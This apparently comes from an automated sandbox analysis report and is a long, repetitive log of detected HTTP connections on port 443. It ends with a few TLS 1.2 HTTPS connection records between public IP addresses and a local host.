Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 52976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 53077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 53041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 52989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 53098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 53075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53089
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53093
Source: unknown	Network traffic detected: HTTP traffic on port 52990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53099
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53098
Source: unknown	Network traffic detected: HTTP traffic on port 53066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53096
Source: unknown	Network traffic detected: HTTP traffic on port 53020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53091
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 53135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 53158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 53032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 53131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 53108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 53181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 53076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 53119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52999
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52990
Source: unknown	Network traffic detected: HTTP traffic on port 53033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52994
Source: unknown	Network traffic detected: HTTP traffic on port 52997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52995
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 53183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 53055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52977
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52987
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52981
Source: unknown	Network traffic detected: HTTP traffic on port 53068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52986
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53109
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53103
Source: unknown	Network traffic detected: HTTP traffic on port 53140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53102
Source: unknown	Network traffic detected: HTTP traffic on port 53163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53107
Source: unknown	Network traffic detected: HTTP traffic on port 52995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53110
Source: unknown	Network traffic detected: HTTP traffic on port 53083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53119
Source: unknown	Network traffic detected: HTTP traffic on port 53185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53113
Source: unknown	Network traffic detected: HTTP traffic on port 53104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53112
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53117
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53120
Source: unknown	Network traffic detected: HTTP traffic on port 53058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53048
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53169
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53168
Source: unknown	Network traffic detected: HTTP traffic on port 53165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53049
Source: unknown	Network traffic detected: HTTP traffic on port 53142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53051
Source: unknown	Network traffic detected: HTTP traffic on port 53062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53175
Source: unknown	Network traffic detected: HTTP traffic on port 53085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53173
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53056
Source: unknown	Network traffic detected: HTTP traffic on port 53102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53177
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53180
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53187
Source: unknown	Network traffic detected: HTTP traffic on port 53039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53184
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53068
Source: unknown	Network traffic detected: HTTP traffic on port 53101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53188

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.7:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.7:52976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:53155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.7:53183 version: TLS 1.2
